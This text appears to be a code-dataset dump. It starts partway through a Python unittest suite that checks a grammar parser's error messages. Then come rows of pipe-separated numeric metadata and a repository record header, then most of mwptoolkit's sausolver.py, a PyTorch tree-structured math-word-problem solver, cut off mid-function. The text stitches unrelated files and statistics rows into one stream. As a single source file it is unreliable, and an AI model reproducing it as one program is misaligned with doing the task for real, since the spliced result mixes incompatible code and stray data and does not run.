"grammar_snippet": "'test' <a: . ) $",
"num_carets": 1,
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[Named Element <a: ...>]>'],
[1, '<[Any String .]>']
],
"tree_type": "Element"
})
grammar_string = textwrap.dedent("*(a: 'test' sep { . ) $")
e = self.get_exception(grammar_string, errors.MismatchedBracketsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Mismatched brackets given; got: ), expecting closing brackets for: <[Iterator Delimiter sep {...}]>",
"line": 1,
"column": 21,
"grammar_snippet": "*(a: 'test' sep { . ) $",
"num_carets": 1,
"grammar_tree": [
[0, '<[Zero or More *(a: ...)]>'],
[1, '<[String Literal test]>'],
[1, '<[Iterator Delimiter sep {...}]>'],
[2, '<[Any String .]>']
],
"tree_type": "Element"
})
def test_named_element_contents_error(self):
# Test passing two contents
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
$ <test: 'test' .> $
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.NamedElementContentsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "<[Named Element <test: ...>]> cannot contain more than one element, already contains: <[String Literal test]>",
"line": 4,
"column": 17,
"grammar_snippet": "$ <test: 'test' .> $",
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Newline $]>'],
[0, '<[Named Element <test: ...>]>'],
[1, '<[String Literal test]>']
],
"num_carets": 1
})
# Test passing non-singular elements
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
$ <test: {'test' .}> $
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.NamedElementContentsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "<[Named Element <test: ...>]> can only contain singular elements, not <[One of Set {...}]>",
"line": 4,
"column": 10,
"grammar_snippet": "$ <test: {'test' .}> $",
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Newline $]>'],
[0, '<[Named Element <test: ...>]>']
],
"num_carets": 1
})
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
$ <test: (a:'test' .)> $
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.NamedElementContentsError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "<[Named Element <test: ...>]> can only contain singular elements, not <[Named Section (a: ...)]>",
"line": 4,
"column": 10,
"grammar_snippet": "$ <test: (a:'test' .)> $",
"tree_type": "Element",
"grammar_tree": [
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[String Literal test]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Any String .]>'],
[0, '<[Newline $]>'],
[0, '<[Named Element <test: ...>]>']
],
"num_carets": 3
})
def test_sub_grammars_disabled_error(self):
grammar_string = textwrap.dedent("""
def test { . }
'test' 'test' 'test'
. . .
$ <test: .> $
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.SubGrammarsDisabledError, False)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Cannot define sub grammar test while allow_sub_grammar_definitions is False",
"line": 2,
"column": 1,
"grammar_snippet": "def test { . }",
"num_carets": 10
})
def test_sub_grammar_scope_error(self):
grammar_string = textwrap.dedent("""
'test' 'test' 'test'
. . .
{ def testg { . } }
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.SubGrammarScopeError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Error defining sub grammar testg. Sub Grammars can only be defined globally or within other sub grammars, not inside a: <[One of Set {...}]>",
"line": 4,
"column": 3,
"grammar_snippet": "{ def testg { . } }",
"num_carets": 11
})
grammar_string = textwrap.dedent("""
def q {
def q2{ $ }
.
}
'test' 'test' 'test'
. . .
<test: def testg { . } >
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.SubGrammarScopeError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Error defining sub grammar testg. Sub Grammars can only be defined globally or within other sub grammars, not inside a: <[Named Element <test: ...>]>",
"line": 9,
"column": 8,
"grammar_snippet": "<test: def testg { . } >",
"num_carets": 11,
"grammar_tree": [
[0, '<[Sub Grammar def q { ... }]>'],
[1, '<[Any String .]>'],
[1, '<[Sub Grammar def q2 { ... }]>'],
[2, '<[Newline $]>']
],
"tree_type": "Sub"
})
grammar_string = textwrap.dedent("""
def q { . }
'test' 'test' 'test'
. . .
?( { def testg { . } } )
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.SubGrammarScopeError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Error defining sub grammar testg. Sub Grammars can only be defined globally or within other sub grammars, not inside a: <[One of Set {...}]>",
"line": 5,
"column": 6,
"grammar_snippet": "?( { def testg { . } } )",
"num_carets": 11,
"grammar_tree": [
[0, '<[Sub Grammar def q { ... }]>'],
[1, '<[Any String .]>']
],
"tree_type": "Sub"
})
def test_undefined_sub_grammar_error(self):
grammar_string = textwrap.dedent("""
def q { . }
'test' 'test' 'test'
. . .
r()
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.UndefinedSubGrammarError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Sub grammar r does not exist",
"line": 5,
"column": 1,
"grammar_snippet": "r()",
"num_carets": 3,
"grammar_tree": [
[0, '<[Sub Grammar def q { ... }]>'],
[1, '<[Any String .]>']
],
"tree_type": "Sub"
})
grammar_string = textwrap.dedent("""
def q {
q()
}
'test' 'test' 'test'
. . .
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.UndefinedSubGrammarError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Sub grammar q does not exist",
"line": 3,
"column": 5,
"grammar_snippet": "q()",
"num_carets": 3
})
grammar_string = textwrap.dedent("""
def q {
def r2 { . }
}
r2()
'test' 'test' 'test'
. . .
"test" "test" "test"
""")
e = self.get_exception(grammar_string, errors.UndefinedSubGrammarError)
error_details = self._parse_grammar_parsing_error_string(e)
self.assertDictEqual(error_details, {
"err_msg": "Sub grammar r2 does not exist",
"line": 5,
"column": 1,
"grammar_snippet": "r2()",
"num_carets": 4,
"grammar_tree": [
[0, '<[Sub Grammar def q { ... }]>'],
[1, '<[Sub Grammar def r2 { ... }]>'],
[2, '<[Any String .]>']
],
"tree_type": "Sub"
})
| 38.566946
| 175
| 0.49227
| 3,474
| 36,870
| 5.001439
| 0.068221
| 0.054331
| 0.050417
| 0.048691
| 0.825612
| 0.815597
| 0.794993
| 0.771626
| 0.74659
| 0.708835
| 0
| 0.022319
| 0.355926
| 36,870
| 955
| 176
| 38.60733
| 0.709353
| 0.015487
| 0
| 0.732571
| 0
| 0.005714
| 0.35252
| 0.000799
| 0
| 0
| 0
| 0
| 0.054857
| 1
| 0.021714
| false
| 0
| 0.009143
| 0
| 0.038857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
21f514d391a1c943fd3bcea268cb1d460d307ae4
| 74,673
|
py
|
Python
|
mwptoolkit/model/Seq2Tree/sausolver.py
|
ShubhamAnandJain/MWP-CS229
|
ce86233504fdb37e104a3944fd81d4606fbfa621
|
[
"MIT"
] | 71
|
2021-03-08T06:06:15.000Z
|
2022-03-30T11:59:37.000Z
|
mwptoolkit/model/Seq2Tree/sausolver.py
|
ShubhamAnandJain/MWP-CS229
|
ce86233504fdb37e104a3944fd81d4606fbfa621
|
[
"MIT"
] | 13
|
2021-09-07T12:38:23.000Z
|
2022-03-22T15:08:16.000Z
|
mwptoolkit/model/Seq2Tree/sausolver.py
|
ShubhamAnandJain/MWP-CS229
|
ce86233504fdb37e104a3944fd81d4606fbfa621
|
[
"MIT"
] | 21
|
2021-02-16T07:46:36.000Z
|
2022-03-23T13:41:33.000Z
|
# -*- encoding: utf-8 -*-
# @Author: Yihuai Lan
# @Time: 2021/08/21 04:59:55
# @File: sausolver.py
import random
import torch
from torch import nn
import copy
from mwptoolkit.module.Encoder.rnn_encoder import BasicRNNEncoder
from mwptoolkit.module.Embedder.basic_embedder import BaiscEmbedder
from mwptoolkit.module.Decoder.tree_decoder import SARTreeDecoder
from mwptoolkit.module.Layer.tree_layers import NodeGenerater, SubTreeMerger, TreeNode, TreeEmbedding
from mwptoolkit.module.Layer.tree_layers import Prediction, GenerateNode, Merge, SemanticAlignmentModule
from mwptoolkit.module.Strategy.beam_search import TreeBeam
from mwptoolkit.loss.masked_cross_entropy_loss import MaskedCrossEntropyLoss, masked_cross_entropy
from mwptoolkit.loss.mse_loss import MSELoss
from mwptoolkit.utils.utils import copy_list
from mwptoolkit.utils.enum_type import NumMask, SpecialTokens
class SAUSolver(nn.Module):
"""
Reference:
Qin et al. "Semantically-Aligned Universal Tree-Structured Solver for Math Word Problems" in EMNLP 2020.
"""
def __init__(self, config, dataset):
super(SAUSolver, self).__init__()
# parameter
self.hidden_size = config["hidden_size"]
self.device = config["device"]
self.USE_CUDA = True if self.device == torch.device('cuda') else False
self.beam_size = config['beam_size']
self.max_out_len = config['max_output_len']
self.embedding_size = config["embedding_size"]
self.dropout_ratio = config["dropout_ratio"]
self.num_layers = config["num_layers"]
self.rnn_cell_type = config["rnn_cell_type"]
self.loss_weight = config['loss_weight']
self.vocab_size = len(dataset.in_idx2word)
self.out_symbol2idx = dataset.out_symbol2idx
self.out_idx2symbol = dataset.out_idx2symbol
generate_list = dataset.generate_list
self.generate_nums = [self.out_symbol2idx[symbol] for symbol in generate_list]
self.mask_list = NumMask.number
self.num_start = dataset.num_start
self.operator_nums = dataset.operator_nums
self.generate_size = len(generate_list)
self.unk_token = self.out_symbol2idx[SpecialTokens.UNK_TOKEN]
try:
self.out_sos_token = self.out_symbol2idx[SpecialTokens.SOS_TOKEN]
except:
self.out_sos_token = None
try:
self.out_eos_token = self.out_symbol2idx[SpecialTokens.EOS_TOKEN]
except:
self.out_eos_token = None
try:
self.out_pad_token = self.out_symbol2idx[SpecialTokens.PAD_TOKEN]
except:
self.out_pad_token = None
# module
self.embedder = BaiscEmbedder(self.vocab_size, self.embedding_size, self.dropout_ratio)
# self.t_encoder = BasicRNNEncoder(self.embedding_size, self.hidden_size, self.num_layers, self.rnn_cell_type, self.dropout_ratio)
self.encoder = BasicRNNEncoder(self.embedding_size, self.hidden_size, self.num_layers, self.rnn_cell_type,
self.dropout_ratio, batch_first=False)
#self.decoder = SARTreeDecoder(self.hidden_size, self.operator_nums, self.generate_size, self.dropout_ratio)
self.decoder = Prediction(self.hidden_size,self.operator_nums,self.generate_size,self.dropout_ratio)
self.node_generater = GenerateNode(self.hidden_size, self.operator_nums, self.embedding_size,
self.dropout_ratio)
self.merge = Merge(self.hidden_size, self.embedding_size, self.dropout_ratio)
self.sa = SemanticAlignmentModule(self.hidden_size,self.hidden_size,self.hidden_size)
self.loss1 = MaskedCrossEntropyLoss()
#
def calculate_loss(self, batch_data):
"""Finish forward-propagating, calculating loss and back-propagation.
Args:
batch_data (dict): one batch data.
Returns:
float: loss value.
"""
seq = batch_data["question"]
seq_length = batch_data["ques len"]
nums_stack = batch_data["num stack"]
num_size = batch_data["num size"]
num_pos = batch_data["num pos"]
target = batch_data["equation"]
target_length = batch_data["equ len"]
equ_mask = batch_data["equ mask"]
num_list = batch_data['num list']
generate_nums = self.generate_nums
num_start = self.num_start
# sequence mask for attention
unk = self.unk_token
loss = self.train_tree(seq, seq_length, target, target_length, \
nums_stack, num_size, generate_nums, num_pos, unk, num_start)
return loss
def model_test(self, batch_data):
"""Model test.
Args:
batch_data (dict): one batch data.
Returns:
tuple(list,list): predicted equation, target equation.
"""
seq = batch_data["question"]
seq_length = batch_data["ques len"]
nums_stack = batch_data["num stack"]
num_size = batch_data["num size"]
num_pos = batch_data["num pos"]
target = batch_data["equation"]
target_length = batch_data["equ len"]
equ_mask = batch_data["equ mask"]
num_list = batch_data['num list']
generate_nums = self.generate_nums
num_start = self.num_start
# sequence mask for attention
all_node_output = self.evaluate_tree(seq, seq_length, generate_nums, num_pos, num_start, self.beam_size,
self.max_out_len)
all_output = self.convert_idx2symbol(all_node_output, num_list[0], copy_list(nums_stack[0]))
targets = self.convert_idx2symbol(target[0], num_list[0], copy_list(nums_stack[0]))
return all_output, targets
def train_tree(self,input_batch, input_length, target_batch, target_length, nums_stack_batch, num_size_batch, generate_nums, num_pos, unk, num_start,
english=False,var_nums=[], batch_first=False):
# sequence mask for attention
seq_mask = []
max_len = max(input_length)
for i in input_length:
seq_mask.append([0 for _ in range(i)] + [1 for _ in range(i, max_len)])
seq_mask = torch.ByteTensor(seq_mask)
num_mask = []
max_num_size = max(num_size_batch) + len(generate_nums) + len(var_nums) # 最大的位置列表数目+常识数字数目+未知数列表
for i in num_size_batch:
d = i + len(generate_nums) + len(var_nums)
num_mask.append([0] * d + [1] * (max_num_size - d))
num_mask = torch.ByteTensor(num_mask) # 用于屏蔽无关数字,防止生成错误的Nx
#unk = output_lang.word2index["UNK"]
# Turn padded arrays into (batch_size x max_len) tensors, transpose into (max_len x batch_size)
input_var = input_batch.transpose(0, 1)
target = target_batch.transpose(0, 1)
padding_hidden = torch.FloatTensor([0.0 for _ in range(self.decoder.hidden_size)]).unsqueeze(0)
batch_size = len(input_length)
if self.USE_CUDA:
input_var = input_var.cuda()
seq_mask = seq_mask.cuda()
padding_hidden = padding_hidden.cuda()
num_mask = num_mask.cuda()
# Zero gradients of both optimizers
# Run words through encoder
#encoder_outputs, problem_output = self.encoder(input_var, input_length)
seq_emb = self.embedder(input_var)
pade_outputs, _ = self.encoder(seq_emb, input_length)
problem_output = pade_outputs[-1, :, :self.hidden_size] + pade_outputs[0, :, self.hidden_size:]
encoder_outputs = pade_outputs[:, :, :self.hidden_size] + pade_outputs[:, :, self.hidden_size:]
# Prepare input and output variables
node_stacks = [[TreeNode(_)] for _ in problem_output.split(1, dim=0)] # root embedding B x 1
max_target_length = max(target_length)
all_node_outputs = []
all_sa_outputs = []
# all_leafs = []
copy_num_len = [len(_) for _ in num_pos]
num_size = max(copy_num_len)
# 提取与问题相关的数字embedding
all_nums_encoder_outputs = self.get_all_number_encoder_outputs(encoder_outputs, num_pos, batch_size, num_size,
self.encoder.hidden_size)
embeddings_stacks = [[] for _ in range(batch_size)] # B x 1 当前的tree state/ subtree embedding / output
left_childs = [None for _ in range(batch_size)] # B x 1
for t in range(max_target_length):
num_score, op, current_embeddings, current_context, current_nums_embeddings = self.decoder(
node_stacks, left_childs, encoder_outputs, all_nums_encoder_outputs, padding_hidden, seq_mask, num_mask)
# all_leafs.append(p_leaf)
outputs = torch.cat((op, num_score), 1)
all_node_outputs.append(outputs)
target_t, generate_input = self.generate_tree_input(target[t].tolist(), outputs, nums_stack_batch, num_start,
unk)
target[t] = target_t
if self.USE_CUDA:
generate_input = generate_input.cuda()
left_child, right_child, node_label = self.node_generater(current_embeddings, generate_input, current_context)
left_childs = []
for idx, l, r, node_stack, i, o in zip(range(batch_size), left_child.split(1), right_child.split(1),
node_stacks, target[t].tolist(), embeddings_stacks):
if len(node_stack) != 0:
node = node_stack.pop()
else:
left_childs.append(None)
continue
# 未知数当数字处理,SEP当操作符处理
if i < num_start: # 非数字
node_stack.append(TreeNode(r))
node_stack.append(TreeNode(l, left_flag=True))
o.append(TreeEmbedding(node_label[idx].unsqueeze(0), terminal=False))
# print(o[-1].embedding.size())
# print(encoder_outputs[idx].size())
else: # 数字
current_num = current_nums_embeddings[idx, i - num_start].unsqueeze(0)
while len(o) > 0 and o[-1].terminal:
sub_stree = o.pop()
op = o.pop()
current_num = self.merge(op.embedding, sub_stree.embedding, current_num) # Subtree embedding
if batch_first:
encoder_mapping, decoder_mapping = self.sa(current_num, encoder_outputs[idx])
else:
temp_encoder_outputs = encoder_outputs.transpose(0, 1)
encoder_mapping, decoder_mapping = self.sa(current_num,temp_encoder_outputs[idx])
all_sa_outputs.append((encoder_mapping, decoder_mapping))
o.append(TreeEmbedding(current_num, terminal=True))
if len(o) > 0 and o[-1].terminal:
left_childs.append(o[-1].embedding)
else:
left_childs.append(None)
# all_leafs = torch.stack(all_leafs, dim=1) # B x S x 2
all_node_outputs = torch.stack(all_node_outputs, dim=1) # B x S x N
target = target.transpose(0, 1).contiguous() # B x S
if self.USE_CUDA:
# all_leafs = all_leafs.cuda()
all_node_outputs = all_node_outputs.cuda()
target = target.cuda()
new_all_sa_outputs = []
for sa_pair in all_sa_outputs:
new_all_sa_outputs.append((sa_pair[0].cuda(), sa_pair[1].cuda()))
all_sa_outputs = new_all_sa_outputs
target_length = torch.LongTensor(target_length).cuda()
else:
target_length = torch.LongTensor(target_length)
semantic_alignment_loss = nn.MSELoss()
total_semanti_alognment_loss = 0
sa_len = len(all_sa_outputs)
for sa_pair in all_sa_outputs:
total_semanti_alognment_loss += semantic_alignment_loss(sa_pair[0], sa_pair[1])
# print(total_semanti_alognment_loss)
total_semanti_alognment_loss = total_semanti_alognment_loss / sa_len
# print(total_semanti_alognment_loss)
# op_target = target < num_start
# loss_0 = masked_cross_entropy_without_logit(all_leafs, op_target.long(), target_length)
loss = masked_cross_entropy(all_node_outputs, target,target_length) + 0.01 * total_semanti_alognment_loss
# loss = loss_0 + loss_1
loss.backward()
# clip the grad
# torch.nn.utils.clip_grad_norm_(encoder.parameters(), 5)
# torch.nn.utils.clip_grad_norm_(predict.parameters(), 5)
# torch.nn.utils.clip_grad_norm_(generate.parameters(), 5)
# Update parameters with optimizers
return loss.item() # , loss_0.item(), loss_1.item()
def evaluate_tree(self, input_batch, input_length, generate_nums, num_pos, num_start, beam_size=5, max_length=30):
seq_mask = torch.BoolTensor(1, input_length).fill_(0)
# Turn padded arrays into (batch_size x max_len) tensors, transpose into (max_len x batch_size)
input_var = input_batch.transpose(0, 1)
num_mask = torch.BoolTensor(1, len(num_pos[0]) + len(generate_nums)).fill_(0)
padding_hidden = torch.FloatTensor([0.0 for _ in range(self.hidden_size)]).unsqueeze(0)
batch_size = 1
if self.USE_CUDA:
input_var = input_var.cuda()
seq_mask = seq_mask.cuda()
padding_hidden = padding_hidden.cuda()
num_mask = num_mask.cuda()
# Run words through encoder
seq_emb = self.embedder(input_var)
pade_outputs, _ = self.encoder(seq_emb, input_length)
problem_output = pade_outputs[-1, :, :self.hidden_size] + pade_outputs[0, :, self.hidden_size:]
encoder_outputs = pade_outputs[:, :, :self.hidden_size] + pade_outputs[:, :, self.hidden_size:]
# Prepare input and output variables
node_stacks = [[TreeNode(_)] for _ in problem_output.split(1, dim=0)]
num_size = len(num_pos[0])
all_nums_encoder_outputs = self.get_all_number_encoder_outputs(encoder_outputs, num_pos, batch_size, num_size,
self.hidden_size)
# B x P x N
embeddings_stacks = [[] for _ in range(batch_size)]
left_childs = [None for _ in range(batch_size)]
beams = [TreeBeam(0.0, node_stacks, embeddings_stacks, left_childs, [])]
for t in range(max_length):
current_beams = []
while len(beams) > 0:
b = beams.pop()
if len(b.node_stack[0]) == 0:
current_beams.append(b)
continue
# left_childs = torch.stack(b.left_childs)
left_childs = b.left_childs
num_score, op, current_embeddings, current_context, current_nums_embeddings = self.decoder(b.node_stack,
left_childs,
encoder_outputs,
all_nums_encoder_outputs,
padding_hidden,
seq_mask,
num_mask)
out_score = nn.functional.log_softmax(torch.cat((op, num_score), dim=1), dim=1)
# out_score = p_leaf * out_score
topv, topi = out_score.topk(beam_size)
for tv, ti in zip(topv.split(1, dim=1), topi.split(1, dim=1)):
current_node_stack = copy_list(b.node_stack)
current_left_childs = []
current_embeddings_stacks = copy_list(b.embedding_stack)
current_out = copy.deepcopy(b.out)
out_token = int(ti)
current_out.append(out_token)
node = current_node_stack[0].pop()
if out_token < num_start:
generate_input = torch.LongTensor([out_token])
if self.USE_CUDA:
generate_input = generate_input.cuda()
left_child, right_child, node_label = self.node_generater(current_embeddings, generate_input,
current_context)
current_node_stack[0].append(TreeNode(right_child))
current_node_stack[0].append(TreeNode(left_child, left_flag=True))
current_embeddings_stacks[0].append(TreeEmbedding(node_label[0].unsqueeze(0), False))
else:
current_num = current_nums_embeddings[0, out_token - num_start].unsqueeze(0)
while len(current_embeddings_stacks[0]) > 0 and current_embeddings_stacks[0][-1].terminal:
sub_stree = current_embeddings_stacks[0].pop()
op = current_embeddings_stacks[0].pop()
current_num = self.merge(op.embedding, sub_stree.embedding, current_num)
current_embeddings_stacks[0].append(TreeEmbedding(current_num, True))
if len(current_embeddings_stacks[0]) > 0 and current_embeddings_stacks[0][-1].terminal:
current_left_childs.append(current_embeddings_stacks[0][-1].embedding)
else:
current_left_childs.append(None)
current_beams.append(TreeBeam(b.score + float(tv), current_node_stack, current_embeddings_stacks,
current_left_childs, current_out))
beams = sorted(current_beams, key=lambda x: x.score, reverse=True)
beams = beams[:beam_size]
flag = True
for b in beams:
if len(b.node_stack[0]) != 0:
flag = False
if flag:
break
return beams[0].out
# def evaluate_tree(self, input_batch, input_length, generate_nums, num_pos, num_start, beam_size=5, max_length=30,var_nums=[]):
# # sequence mask for attention
# seq_mask = torch.ByteTensor(1, input_length).fill_(0)
# # Turn padded arrays into (batch_size x max_len) tensors, transpose into (max_len x batch_size)
# input_var = torch.LongTensor(input_batch).unsqueeze(1)
#
# num_mask = torch.ByteTensor(1, len(num_pos) + len(generate_nums) + len(var_nums)).fill_(0)
#
# # Set to not-training mode to disable dropout
#
# padding_hidden = torch.FloatTensor([0.0 for _ in range(self.decoder.hidden_size)]).unsqueeze(0)
#
# batch_size = 1
#
# if self.USE_CUDA:
# input_var = input_var.cuda()
# seq_mask = seq_mask.cuda()
# padding_hidden = padding_hidden.cuda()
# num_mask = num_mask.cuda()
#
# # Run words through encoder
# encoder_outputs, problem_output = self.encoder(input_var, input_length)
#
# # Prepare input and output variables # # root embedding B x 1
# node_stacks = [[TreeNode(_)] for _ in problem_output.split(1, dim=0)]
#
# num_size = len(num_pos)
# # 提取与问题相关的数字embedding
# all_nums_encoder_outputs = self.get_all_number_encoder_outputs(encoder_outputs, [num_pos], batch_size, num_size,
# self.encoder.hidden_size)
# # B x P x N
# embeddings_stacks = [[] for _ in range(batch_size)]
# left_childs = [None for _ in range(batch_size)]
# beam_search=True
# if beam_search:
# beams = [TreeBeam(0.0, node_stacks, embeddings_stacks, left_childs, [])]
#
# for t in range(max_length):
# current_beams = []
# while len(beams) > 0:
# b = beams.pop()
# if len(b.node_stack[0]) == 0:
# current_beams.append(b)
# continue
# # left_childs = torch.stack(b.left_childs)
# left_childs = b.left_childs
#
# num_score, op, current_embeddings, current_context, current_nums_embeddings = self.decoder(
# b.node_stack, left_childs, encoder_outputs, all_nums_encoder_outputs, padding_hidden,
# seq_mask, num_mask)
#
# # leaf = p_leaf[:, 0].unsqueeze(1)
# # repeat_dims = [1] * leaf.dim()
# # repeat_dims[1] = op.size(1)
# # leaf = leaf.repeat(*repeat_dims)
# #
# # non_leaf = p_leaf[:, 1].unsqueeze(1)
# # repeat_dims = [1] * non_leaf.dim()
# # repeat_dims[1] = num_score.size(1)
# # non_leaf = non_leaf.repeat(*repeat_dims)
# #
# # p_leaf = torch.cat((leaf, non_leaf), dim=1)
# out_score = nn.functional.log_softmax(torch.cat((op, num_score), dim=1), dim=1)
#
# # out_score = p_leaf * out_score
#
# topv, topi = out_score.topk(beam_size)
#
# # is_leaf = int(topi[0])
# # if is_leaf:
# # topv, topi = op.topk(1)
# # out_token = int(topi[0])
# # else:
# # topv, topi = num_score.topk(1)
# # out_token = int(topi[0]) + num_start
# for tv, ti in zip(topv.split(1, dim=1), topi.split(1, dim=1)):
# current_node_stack = copy_list(b.node_stack)
# current_left_childs = []
# current_embeddings_stacks = copy_list(b.embedding_stack)
# current_out = copy.deepcopy(b.out)
# out_token = int(ti)
# current_out.append(out_token)
#
# node = current_node_stack[0].pop()
#
# # var_num当时数字处理,SEP/;当操作符处理
# if out_token < num_start: # 非数字
# generate_input = torch.LongTensor([out_token])
# if self.USE_CUDA:
# generate_input = generate_input.cuda()
# left_child, right_child, node_label = self.node_generater(current_embeddings, generate_input,
# current_context)
#
# current_node_stack[0].append(TreeNode(right_child))
# current_node_stack[0].append(TreeNode(left_child, left_flag=True))
#
# current_embeddings_stacks[0].append(TreeEmbedding(node_label[0].unsqueeze(0), False))
# else: # 数字
# current_num = current_nums_embeddings[0, out_token - num_start].unsqueeze(0)
#
# while len(current_embeddings_stacks[0]) > 0 and current_embeddings_stacks[0][-1].terminal:
# sub_stree = current_embeddings_stacks[0].pop()
# op = current_embeddings_stacks[0].pop()
# current_num = self.merge(op.embedding, sub_stree.embedding, current_num)
# current_embeddings_stacks[0].append(TreeEmbedding(current_num, True))
# if len(current_embeddings_stacks[0]) > 0 and current_embeddings_stacks[0][-1].terminal:
# current_left_childs.append(current_embeddings_stacks[0][-1].embedding)
# else:
# current_left_childs.append(None)
# current_beams.append(
# TreeBeam(b.score + float(tv), current_node_stack, current_embeddings_stacks,
# current_left_childs, current_out))
# beams = sorted(current_beams, key=lambda x: x.score, reverse=True)
# beams = beams[:beam_size]
# flag = True
# for b in beams:
# if len(b.node_stack[0]) != 0:
# flag = False
# if flag:
# break
#
# return beams[0].out
# else:
# all_node_outputs = []
# for t in range(max_length):
# num_score, op, current_embeddings, current_context, current_nums_embeddings = self.decoder(
# node_stacks, left_childs, encoder_outputs, all_nums_encoder_outputs, padding_hidden,
# seq_mask, num_mask)
#
# out_scores = nn.functional.log_softmax(torch.cat((op, num_score), dim=1), dim=1)
# out_tokens = torch.argmax(out_scores, dim=1) # B
# all_node_outputs.append(out_tokens)
# left_childs = []
# for idx, node_stack, out_token, embeddings_stack in zip(range(batch_size), node_stacks, out_tokens,
# embeddings_stacks):
# # node = node_stack.pop()
# if len(node_stack) != 0:
# node = node_stack.pop()
# else:
# left_childs.append(None)
# continue
# # var_num当时数字处理,SEP/;当操作符处理
# if out_token < num_start: # 非数字
# generate_input = torch.LongTensor([out_token])
# if self.USE_CUDA:
# generate_input = generate_input.cuda()
# left_child, right_child, node_label = self.node_generater(current_embeddings, generate_input,
# current_context)
# node_stack.append(TreeNode(right_child))
# node_stack.append(TreeNode(left_child, left_flag=True))
# embeddings_stack.append(TreeEmbedding(node_label.unsqueeze(0), False))
# else: # 数字
# current_num = current_nums_embeddings[idx, out_token - num_start].unsqueeze(0)
# while len(embeddings_stack) > 0 and embeddings_stack[-1].terminal:
# sub_stree = embeddings_stack.pop()
# op = embeddings_stack.pop()
# current_num = self.merge(op.embedding.squeeze(0), sub_stree.embedding, current_num)
# embeddings_stack.append(TreeEmbedding(current_num, terminal=True))
#
# if len(embeddings_stack) > 0 and embeddings_stack[-1].terminal:
# left_childs.append(embeddings_stack[-1].embedding)
# else:
# left_childs.append(None)
#
# # all_leafs = torch.stack(all_leafs, dim=1) # B x S x 2
# all_node_outputs = torch.stack(all_node_outputs, dim=1) # B x S x N
# all_node_outputs = all_node_outputs.cpu().numpy()
# return all_node_outputs[0]
def get_all_number_encoder_outputs(self, encoder_outputs, num_pos, batch_size, num_size, hidden_size):
indices = list()
sen_len = encoder_outputs.size(0)
masked_index = []
temp_1 = [1 for _ in range(hidden_size)]
temp_0 = [0 for _ in range(hidden_size)]
for b in range(batch_size):
for i in num_pos[b]:
indices.append(i + b * sen_len)
masked_index.append(temp_0)
indices += [0 for _ in range(len(num_pos[b]), num_size)]
masked_index += [temp_1 for _ in range(len(num_pos[b]), num_size)]
indices = torch.LongTensor(indices)
masked_index = torch.BoolTensor(masked_index)
masked_index = masked_index.view(batch_size, num_size, hidden_size)
if self.USE_CUDA:
indices = indices.cuda()
masked_index = masked_index.cuda()
all_outputs = encoder_outputs.transpose(0, 1).contiguous()
all_embedding = all_outputs.view(-1, encoder_outputs.size(2)) # S x B x H -> (B x S) x H
all_num = all_embedding.index_select(0, indices)
all_num = all_num.view(batch_size, num_size, hidden_size)
return all_num.masked_fill_(masked_index, 0.0)
def generate_tree_input(self, target, decoder_output, nums_stack_batch, num_start, unk):
# when the decoder input is copied num but the num has two pos, chose the max
target_input = copy.deepcopy(target)
for i in range(len(target)):
if target[i] == unk:
num_stack = nums_stack_batch[i].pop()
max_score = -float("1e12")
for num in num_stack:
if decoder_output[i, num_start + num] > max_score:
target[i] = num + num_start
max_score = decoder_output[i, num_start + num]
if target_input[i] >= num_start:
target_input[i] = 0
return torch.LongTensor(target), torch.LongTensor(target_input)
def mse_loss(self, outputs, targets, mask=None):
# outputs : [batch_size,output_len,hidden_size]
# targets : [batch_size,output_len,hidden_size]
# mask : [batch_size,output_len]
mask = mask.to(self.device)
x = torch.sqrt(torch.sum(torch.square((outputs - targets)), dim=-1)) # [batch_size,output_len]
y = torch.sum(x * mask, dim=-1) / torch.sum(mask, dim=-1) # [batch_size]
return torch.sum(y)
def convert_idx2symbol(self, output, num_list, num_stack):
# batch_size=output.size(0)
'''batch_size=1'''
seq_len = len(output)
num_len = len(num_list)
output_list = []
res = []
for s_i in range(seq_len):
idx = output[s_i]
